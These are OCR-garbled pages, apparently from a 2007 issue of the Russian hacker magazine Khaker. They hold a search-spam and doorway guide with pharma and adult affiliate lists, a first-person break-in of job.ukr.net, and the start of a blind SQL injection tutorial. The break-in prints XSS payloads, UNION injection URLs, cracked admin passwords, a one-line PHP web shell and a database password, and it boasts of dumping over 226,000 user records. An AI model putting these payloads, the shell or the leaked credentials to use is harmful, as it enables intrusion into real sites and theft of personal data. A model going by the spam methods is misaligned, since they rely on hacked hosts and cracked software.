книги хакеры / журнал хакер / 108_Optimized

Блин, я купил себе поесть, и денег больше не осталось.

Петров, бедняга, работа админом делает тебя голодным? Ну на тебе немного кэша. А вообще, подтягивайся, будем вместе нагоднять траф с поисковиков.

Сделай сам!

Атеперьмывместестобойсделаемсвойпервыйдор.Дляпримеравозьмем ужеупоминавшуюсявышевиагруинайденныедлянеекеи.Далееидемв DoorwayPageWizard(DPW),чтобысгенеритьдор(руководствкпрограмме винетеоченьмного,поэтомуописыватьработупрогиянестану).ТутDPW

запроситссылку,покоторойбудетпроходитьредирект;еетысможешьвзятьв партнерке(обычновразделеLinks).Послегенерациидоразаливаемполученноенавзломанныйпиаристыйшеллидумаем,какспамить.Дляэтогоищем гостевыекниги,форумыилюбыескриптывинете,гдеможнооставлятьсвои комментарии,дляэтогоможнозаюзатьлибоAgressParser,либопарсерГугла (например,http://yourguest.com.ru/test.php).Мывозьмемдляпримеравторой. Итак,вводимвверхнееполеguestaddинажимаем«Искать»,онвыведет списокгостевух.Причем,еслиPRгостевойкнигименьшечетырех,можешь неприниматьтакойсайтвовнимание(приручномспаме).Такиегесты нужнытем,ктоспамиттысячигестсразу.Вообще,спамитьвручную,конечно же,неэффективно.ВышеятебеужесоветовалХрумер.Такжетыможешь

Aggress Parser

поискатьнаSEO-форумахлюбойхалявныйавтосабмиттер.Например,есть программаStonediverMultiSubmitter(www.ougo.com/multisubmit/tests,с

прилагающимсямануаломпопрогеотодногоизизвестнейшихсеошников

—GreenWood’а:http://bloggreenwood.com/comments/759_0_1_0_C/).Ей тожеможноспамить,нопрогаоченьтормознаяиглючная.ЕщемогупорекомендоватьSmartPoster.Онплатный,ноничтонемешаеттебепоискатькряк. Как видишь, в дорвеинге без приватного софта не обойтись. Надеюсь, что суть ты понял и купишь себе нужные проги (поверь, это того стоит :)).

Злоключение

Перечитай еще раз внимательно все, что я тут понаписал, и еще внимательнее — врезку с интервью и начинай действовать прямо сейчас. Ведь как Новый год встретишь, так его и проведешь :). Да, и я надеюсь, что тебе хватит вечнозеленых президентов, для того чтобы отблагодарить меня ящиком-другим пива сразу после зимних праздников. С Новым годом, новоиспеченный оптимизитор! z

Обзорпартнерок, безкоторых необойтись

ПартнерскиепрограммыPPC:

www.umaxlogin.com—известнейшаяPPC-партнерка,работающаяс русскимивеб-местерами.75%отстоимостибида.

klikvip.com—PPCдлябуржуйскоготрафа,ежедневныевыплаты. www.CompactSEO.com—высокиебиды,быстрыевыплаты. peakclick.com—ещеоднаPPC,хорошиебиды(99%). marketing.3fn.net—надежнаяPPCсеженедельнымивыплатами. www.xmlcash.com—партнеркаотMauser’a.Платяткаждуюнеделю, минималка—$5.

click-click.ru—русскаяPPC.

clickcashmoney.com—выкупаютроссийскийтраф;выплатыразвнеде- лювWebMoney;минимальнаясуммавыплат—$15. www.searchfeed.com—здесьможнокупить/продатьрекламу.Крупная буржуйскаяPPC-партнерка.

ПартнерскиепрограммыPPS(Pay-Per-Sell/Sign): adultfriendfinder.com—$0,3зарегистрациюмужчиныи$1,5за регистрациюженщиныплюс50%отстоимостикупленныхимиуслуг пожизненно.

rengodating.com — реселлер AdultFriendFinder, $2 за любую регистрацию.

stimul-media.com—русскаяPPS.

www.videoscash.com—конвертацияадалтногоилимусорноготрафа. www.adultcash.ru—конвертацияадалтноготрафа. www.joebucks.com — партнерка, торгующая «травяными» препаратами.

rx-partners.biz—ещеоднаfarmacy-партнерка(работающаясфарма- цевтикой).До50%комиссии.ЕженедельныевыплатывWebMoney, Fethard,Neteller,PayPal,WireTransfer,Stormpay,Moneybookers,E-Gold, E-Passporte.

www.rxpayouts.com—ещеоднаfarmacy-партнерка. www.affiliatepharmacynetwork.com—партнерскаяпрограммапофар-

мацевтике.Предоставляетдлясвоихпартнеровтехническуюпомощьи нарусскомязыке.

genbucks.com—партнерскаяпрограммапофармацевтике. www.pharmamedics.com—партнерскаяпрограммапофармацевтике. evapharmacy.biz—партнерскаяпрограммапофармацевтике.Комисси- онныедо45%.

www.affiliatecube.com—разносторонняяпартнерскаяпрограммапо популярнымтемамвинтернете.

shopxml.com—серьезнаяпартнеркаотMauser’aпо ювелирке,детоксам, чармсам,пирсингуимедицинскимтестам.

affiliate.comfi.com—партнеркапопродажемеждународныхтелефон-

ныхкарточек(phonecards,telephonecards,callingcards).

Интервью

Длятогочтобытыпонял,какподнявшиесялюдирубятсвоибабки,я представляютвоемувниманиюинтервьюсоднимизуспешныхсеош- ников—extrim.Понеслась:).

(Орфографияистилистикасохранены) Mag(с):

Приветствую:). extrim:

Привет. Mag(с):

Какнастроение? extrim:

Наплываетпотихоньку...Времясейчасхорошее:). Mag(с):

О,этохорошо:),ятутхотелнемноготебяпопытатьнатемудорвееводства,тыкак?

extrim:

Ммм...Пытай...Тольконебольно...:) Mag(с):

Ок:).Какдавнотывтеме?ИкаквообщепришелвSEO? extrim:

Втемеясравнительнонедавно...Даже,таксказать,новичоквмире SEO...Втемупришелчутьбольшеполугоданазад:подвернуласьссылка насайткакого-тосеошника...Тамбылополноеописаниепримитивных доровсфри-прогойдлягенерацииинемногосоветовначинающему дорвейщику...Решилпрочесть...

Mag(с):

Воткаквсепросто:).Скажи,легколибылоначинать,какиевстречалисьпрепятствиянапутиикакиепрогипредпочитаешьдляведения биза?

extrim:

Неповеришь...Я,какребенок,спаливиделтысячидолларовнасчету WebMoney,новсекрутообламывалось...Впервыймесяцянезаработал ницента...Но,обоги,деньгипошли...замесяцясрубил100баков...

ЭтиденьгиибылидляменяначаломкарьерывСЕО.Якупил дорген...

ууважаемогомнойLezzvie(www.lezzvie.ru),тогдаэтобылфорум-гене- ратор,ныне—red.Button...Авторнетолькопомогмненастроитьего, ноиподсказалнекоторыенюансывСЕО...Далееянакупилдоменов иначалспамить...Спамилрукаминавысокопиаристыересурсы:). Какиепроги?Ну,какяужесказал,доргенотЛеззвияплюссамописная спамилкаодногомоегохорошегодруга.Инемногофантастикиввиде высокопиаристыхдоменов...пробитьсясновыхдоменовнереально. Mag(с):

Тыдумаешь,чтонереально?Акакжевсеэтирассказыпрофарма-мага- зиныибелуюоптимизациюнафриварныххостингах?

extrim:

Нановыхдоменах...Не,нереально...какойтрастдлянихупоисковиков?Это,каклевыйчеловекподойдетктебенаулицеипопроситпоз-

вонитьмобилускамерой:).Фарма-магазины...реальнаятема...нотам опятьженуженоченьхорошийплатящийфарма-траф,япоканеготов уйтисPPCнасайнапы...Фриварныехостинги...ну,какбытаксказать...

да,дорывылезают...ноневсе...нужноуметьихискать...Япредпочитаю кушатьхлебскраснойикройввидешелловктрастовымдоменам:(.

Ахда,тыпробелуюоптимизацию...«Нет,мама,этофантастика».Фантастикавпланетого,чтонужноубитьнеменьшегода,длятогочтобырас- крутитьбелыйпроектхотькак-то...Атутчерезпарумесяцевпоявится конкурент,которыйутебятвойбелыйхлебзаберет...Явэтоневерю. Mag(с):

Интересно....Расскажи,доменыкакоготипапользуютсянаибольшим трастомуГуглаи,кактыдумаешь,каковасудьба.eduвдальнейшем? Будутлиониещепущебаниться?:)

extrim:

.eduужеотъездились...Гуглуженедоверяетимтак...Раньшенарод делалтысячибаксоввденьседух...Сейчастемаснимипрактически померла...Какоготипа?Старые-старыедоменысхорошимпр...иеще одномаленькоено(онемнетакхочетсяговорить...).

Mag(с):

Нонашиммногоуважаемымчитателямтысможешьобэтомносказать?:)

extrim:

Понимаешь,алгоритмыменяются...Нужнопростоследитьианализи- ровать...Тупоклепатьдорыиспамитьих—сэтогомногонезаработа- ешь...Тутвседомелочей:имя,возраст,страна...

Mag(с):

Ясно,подробностисвоегобизаниктонехочетпалить:).Ну,надеюсь, иэтойинфыбудетдостаточно.Скажи,алегколивообщедобывать пиаристыедомены,кудаможнолитьдоры?

extrim:

Легко...покрайнеймере,мне...Янепокупаюничего...Явседелаю сам...Домен—дор—спам.Эксплойтамиживетипроцветаетнаша страна:(.

Mag(с):

Авкакойобластитысамкрутишься?Фарма,адалт?Спалинесколько хорошихкеев.

extrim:

Начиналсадалта...Сейчаснафарме...tramadol,viagra,cialis:). Mag(с):

Спасибозаответы:).Иеще,еслинесекрет,сколькотысейчасзарабатываешьвмесяц?

extrim:

Покачто3квялыхенотов:). Mag(с):

Думаю,этобудетхорошийстимулдлянашихчитателей.Несмеюбольшетебязадерживать,огромныйреспектзаинтервью!:)

extrim:

Надеюсь,этоинтервьюпоможетпаредорвейщиков.Тольконешколь- ников-пятиклассников:).Дети,таблетки—этонеигрушки!

Mag(с):

Ятоженаэтонадеюсь:).

Александр «lamarez» Еременко

/ uaxakep@gmail.com /

На старт, внимание, марш!

Ущерб от взлома крупных холдинговых компаний оценивается в миллионы, а то и в десятки миллионов баксов (как это было с «Бигмиром»). Поэтому хачить подобные организации — довольно рискованное занятие, ведь зачастую такие конторы не экономят на сисадминах, кодерах и, самое главное, юристах.

Ладно,янестанугрузитьтебянотациямииперейдунепосредственнокопи- саниювзлома.Новначалескажу,что,ломаячто-либо,я(даиврядлиодиня :))всегдаобращаюсьзапомощьюкГуглу.Иэтотразнесталисключением...

Итак, я залез в мой любимый поисковик и вбил нехитрый запрос «site: ukr.net». Получив огромное количество страниц, я приступил к поиску

интересных ответов. Сперва мой взор упал на сайт globe.ukr.net, но эксперименты с его контентом ничего не дали. Единственной победой была бесполезная XSS (http://globe.ukr.net/_data_handler. aspx?callback=<h1>test</test>’_fillCountries&cnt=countries_

mainpage). Посмотрев несколько других сайтов от ukr.net, я нашел еще одну банальную XSS на paycard.ukr.net (проект специально заточен под статистику трафика неудачников-диалапщиков). URL выглядел примерно так:

http://paycard.ukr.net:8080/pls/abs/web_un.show?page_n ame=<script>alert('lol');</script>&logname=&chksum=

Наглядный процесс брута хэшей

Но меня не интересовали XSS, я хотел найти что-то более серьезное, вроде SQL-инъекции или инклуда. А потому я вернулся в Гугл и сделал свой запрос более навороченным: «filetype:php site:ukr.net inurl:id=», что в переводе на русский означало: «Иди туда, не знаю куда, принеси то, не знаю что». Шутка. А если серьезно, перевод был следующим: «Найти все ссылки в файлах с расширением php во всех доменах *.ukr.net, в которых встречается фраза 'id='».

Удача не заставила себя ждать. В глаза практически сразу бросился линк http://job.ukr.net/viewres/view_IDres.php?rid=450717. Посмотрев на эту страницу повнимательнее, я догадался, что тут может быть SQL-инъект. Но сразу рваться в бой я не стал, а лишь попробовал добавить к запросу «‘». К моему удивлению, сервер в ответ ничего не выдал. Это означало, что

либо скрипт беспощадно фильтровал значение переменной rid, либо вывод ошибок был отключен.

Но я не отчаивался — главное было зацепиться. Я подставил в переменную rid значение 450717+AND+1=1/* (что всегда означает логическое true) и сравнил с результатом значения 450717+AND+1=2/* (что всегда означает логическое false). Причем в первом случае ответ был идентичен оригиналу

(http://job.ukr.net/viewres/view_IDres.php?rid=450717). Это доказывало факт наличия инъекции.

Сразу же после моего очередного открытия я приступил к подбору числа колонок. Ситуацию омрачал тот факт, что вывод ошибок был отключен. Таким образом, пришлось все делать вручную, а не с помощью скриптов.

Через несколько минут я получил то, что хотел, — колонок оказалось значительное количество, аж 37 штук. Конечный URL выглядел так:

http://job.ukr.net/viewres/view_IDres.php?rid=- 1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37/*

К счастью, вывод данных присутствовал, и я мог получить все значения таблиц. Первое, что я попробовал сделать, — это вывести поля с mysql.user, но обломался — доступа не было.

Подставив на место 19 й колонки конструкцию «concat_ws(char(59),vers ion(),user())», я узнал, что функция version() возвратила значение 5.0.24a (версия MySQL), а функция user() вернула jobuser@host15 (имя пользовате-

ля MySQL).

Любимый MySQL5

Так как СУБД была из пятой ветки, я мог вывести информацию из таблички INFORMATION_SCHEMA, а это значило, что мне не придется подбирать название таблиц/колонок. А это уже очень круто!

Итак, уже через 5 минут у меня был огромный список таблиц (состоящий из 225 штук). Быстро просмотрев его, я обратил внимание только на три: members, wp2_users, wp_users. Но для уверенности, что в таблицах содержатся конфиденциальные данные юзеров, я инжектировал следующий запрос:

Главная страница пораженного портала

SELECT table_name FROM information_schema.columns WHERE information_schema.columns.column_name LIKE '%pass%';

В ответ на этот финт мне вывелись все те же таблицы (их полный список ты можешь найти на нашем DVD), что не могло не радовать. Исходя из названий некоторых табличек (wp2_users, wp_users), можно было догадаться, что это WordPress (далее WP).

Чуть позже я узнал названия колонок обоих таблиц. Получив данные из wp2_users и wp_users, я обратил внимание на даты регистраций (в wp2_users — шесть юзеров, wp_users — восемь) и понял, что wp2_users

содержала более новые регистрации, в связи с чем хэши из нее и полетели в любимый PasswordsPro.

Спустя 2-3 минуты после старта брута я расшифровал ровно половину хэшей:

login:md5(pass):pass

dron:698d51a19d8a121ce581499d7b701668:111

prach:61731aee5b7b352ccd9b75cdb5d0d081:prach

cover:7694f4a66316e53c8cdd9d9954bd611d:q

Вот такие смешные пароли ставят админы на таких огромных сайтах, как ukr.net.

Сам движок WP висел на http://job.ukr.net/news. Получив реальные пароли, я пошел в атаку. Панель администрирования располагалась по адресу http://job.ukr.net/news/wp-login.php, куда я и направил свой браузер.

На полпути к успеху

Так я стал админом! Теперь я мог создавать, редактировать и удалять новости, но мне этого было мало. Как известно, в WP без труда можно получить шелл с помощью редактора шаблонов, переписав PHP-файл, входящий в состав шаблона. Это я и сделал. Как? Сейчас объясню.

Сначала я вписал в index_.php (так назывался имеющийся в движке PHPфайл) стандартный однострочный шелл типа:

<?if(isset($_GET['cmd']){system($_GET['cmd']);}?>,

Затем зашел по урлу http://job.ukr.net/news/wp-content/themes/ simpla1/index_.php?cmd=id, но, к своему сожалению, не получил никакого результата :(.

Но я не отчаялся, а решил залить полноценный многофункциональный шелл, работающий через opendir(). На удивление, получилось, и передо мной предстал список файлов, данные о системе и... предательский safe_mod :(. Из-за него мои права были сильно урезаны, и потому я не

получил никаких привилегий в системе. Мне даже не удавалось прочитать /etc/passwd, что очень огорчало.

Не падая духом, я начал искать конфиги — это, несмотря на safe_mod, я мог делать. Прочитав /var/www/job/config.php, я увидел логин/пароль от БД:

Но, как назло, логин и пасс не подходили. И мне предстояло выяснить почему. Для исправления ситуации, я решил посмотреть другой конфиг — /var/www/job/news/config.php,

но и там пароля не оказалось. Но внимательнее посмотрев, я обнаружил, что он инклудил в себе третий конфиг:

Содержимое

/var/www/job/classes/mysql.config.php

<?php

class mysql_ini{

var $host = "10.60.20.12"; //var $host = "localhost"; var $db="job_news";

var $login = "newsmast";

#var $user = "jobuser";

var $pass = "rbtdl;j,";

}

?>

Здесь мне повезло — в конфиге оказались реальные логин/пароль от БД. Надо отметить, что этот конфиг распространялся на все сервисы домена job.ukr.net.

Я прицепился к СУБД линком:

http://job.ukr.net/news/wp-content/themes/ simpla1/sqldump.php?s=y&login=jobuser&passwd =rbtdl;j,&server=10.60.20.12&port=3306&db=aj ob&tbl=members&limit_start=0&limit_count=5

Затем слил базу с юзерами — members (226131 юзеров) и базу работодателей — agency (~550 юзеров), после чего благополучно удалился :).

Happy end

Всю следующую ночь меня мучили кошмары, будто я сижу в СИЗО и подвергаюсь ежедневным пыткам. Проснувшись утром в холодном поту, я набрался смелости и позвонил в

техподдержку ukr.net, чтобы сообщить им, что безопасность их ресурсов оставляет желать лучшего. Как и прогнозировалось, уже назавтра баг прикрыли, а мои шеллы удалили.

Я не поленился и снова залил шелл через админку (благо пароли остались прежними :)). Но обломался — WP переустановили в другую папку, а администратор усилил настройки Apache. Файлы http://job.ukr.net уже находились в /var/www/ job/, а http://job.ukr.net — в /var/www/jobnews. Поскольку все базы мирно покоились на моем винте, я не стал заново раскручивать баг, оставив ситуацию на совести админов.z

xàêåð 12 /108/ 07

Евгений «gemaglabin» Минаев

/ gemaglabin@antichat.ru /

Такиенезаметныеинъекции

НевсегдаприпроведенииSQL-инъекцийможновоспользоватьсяопера- торомUNION,итогдаединственныйспособполучитьценнуюинформацию изтаблиц—посимвольныйпереборданных.Да,методгрубый,нозато универсальныйдлявсехSQL-операторов,будьтоUPDATE,SET,DELETEили INSERT.Ведьдажепослемодификацииданных,поступившихвтаблицу, результатнасневсегдабудетустраиватьввидуеенеидеальнойструктуры. РазъяснюнекоторыетеоретическиеазыMySQL.Аеслитыихужепостиг

—оченьхорошо,повторение—матьучения.

Полезные функции MySQL

Рассмотрим ряд функций, которые упрощают жизнь как программисту, составляющему запросы в скриптах, так и хакеру, который ищет изъяны в таких запросах :). Давай условимся, что для простоты восприятия в качестве примеров я буду публиковать запросы в чистом виде, а после стрелочки (->) указывать результат их выполнения.

1.ASCII(STRING) — очень простая функция: она возвращает числовое значение первого символа строки или ноль, в случае если строка является пустой. Ввиду ограниченности типа STRING функция возвращает число в

sql dumper

диапазоне от 0 до 255. Например:

SELECT ASCII(1) -> 49

SELECT ASCII(‘1’) -> 49

SELECT ASCII(‘a’) -> 97

SELECT ASCII(‘aa’) -> 97

2.ORD(STRING) — возвращает код первого символа строки-аргумента.

SELECT ORD(1) -> 49

SELECT ORD(‘1’) -> 49

SELECT ORD(‘a’) -> 97

SELECT ORD(‘aa’) -> 97

3.BETWEENMINANDMAX.ЕсливыражениебольшеилиравноMINименьше илиравноMAX,тоBETWEEN()возвратит1,иначерезультатбудетнулевым. Если все элементы однотипны (и, к примеру, имеют числовой тип), то сравнительный запрос сводится к выражению «MIN <= QUERY AND QUERY <= MAX». Примечательно, но до MySQL 4.0.5 в результате сравнения неоднотипных данных получается следующее:

SELECT 5 BETWEEN 1 AND 6 -> 1

SELECT 5 BETWEEN ‘1’ AND ‘6’ -> 1

SELECT 5 BETWEEN 1 AND 4 -> 0

SELECT 5 BETWEEN ‘1’ AND ‘4’ -> 0

То есть MySQL пытается сделать тип общим! Это нам только на руку. Почему? Терпение, мой друг, узнаешь чуть позже :).

4.IN(VALUE1, VALUE2) — возвращает 1, если запрос равен одному из значений, лежащих в IN(). В противном случае вернет 0. Если все значения являются константами, они чувствительны к регистру и обрабатываются в соответствии с типом запроса, а затем сортируются методом бинарных деревьев. То есть запрос выполнится максимально быстро, если все переменные однотипны.

SELECT 1 IN (2,3,4,5,1) -> 1

SELECT 1 IN (2,3,4,5,’1’) -> 1

SELECT 1 IN (2,3,4,5,0) -> 0

SELECT 1 IN (2,3,4,5,’0’) -> 0

5.LOWER(STRING) — приводит строку к нижнему регистру в соответствии с текущим набором символов (по умолчанию ISO-8859-1).

SELECT LOWER(‘ITDEFENCE’) -> itdefence

SELECT LOWER(‘ITDEFeNCE’) -> itdefence

SELECT LOWER(‘itdefence’) -> itdefence

SELECT LOWER(123) -> 123

sql tools

6.SUBSTRING(STRING,POSITION,LENGTH) — копирует подстроку из строки STRING с позиции POSITION длиной LENGTH.

SELECT SUBSTRING(‘itdefence’,4) -> efence SELECT SUBSTRING(‘itdefence’ FROM 4) -> efence SELECT SUBSTRING(‘itdefence’,4,2) -> ef SELECT SUBSTRING(‘itdefence’,1,2) -> it

7. SUBSTRING_INDEX(STRING,DELIMITER,LENGTH) — возвращает подстро-

ку строки STRING до позиции LENGTH после разделителя DELIMITER. Если значение LENGTH положительное, возвращается все, что лежит слева от DELIMITER, если отрицательное — все, что справа.

SELECT SUBSTRING_INDEX(‘itdefence.ru’, ‘.’ ,2) -> itdefence.ru

SELECT SUBSTRING_INDEX(‘itdefence.ru’,’.’,-1) -> ru SELECT SUBSTRING_INDEX(‘itdefence.ru’,’.’,1) -> itdefence

8.BENCHMARK (COUNT,FUNCTION) — выполняет COUNT раз функцию

FUNCTION, создана для тестирования запросов на предмет загрузки сервера.

SELECT BENCHMARK(31337,ENCODE(‘skvoz’,’noy’))

Подзапросы, с чем их едят

Нередко для проведения SQL-атак тебе может понадобиться помощь вложенных подзапросов. Чтобы понять, как они устроены, я в качестве примера рассмотрю MySQL v. > 4.1. Именно с этой версии поддерживаются все формы подзапросов, которых требует стандарт SQL. Подзапрос можно вкладывать в родительский запрос (или даже подзапрос), предварительно обрамив его скобами:

SELECT * FROM ‘users’ WHERE ‘id’ = (SELECT MAX(ID) FROM ‘users’)

SELECT * FROM ‘users’ WHERE ‘id’ = ANY (SELECT MAX(id) FROM ‘users’)

SELECT * FROM ‘users’ WHERE (1,1) = (SELECT ‘id’,’username’ FROM ‘users’)

При использовании подзапросов могут неожиданно встретиться следующие ошибки:

1.Неподдерживаемый синтаксис, или «1235 — This version of MySQL doesn’t yet support ‘LIMIT & IN/ALL/ANY/SOME subquery’».

Такая ошибка может возникнуть при запросе вида:

SELECT * FROM ‘users’ WHERE ‘id’ IN (SELECT ‘id’ FROM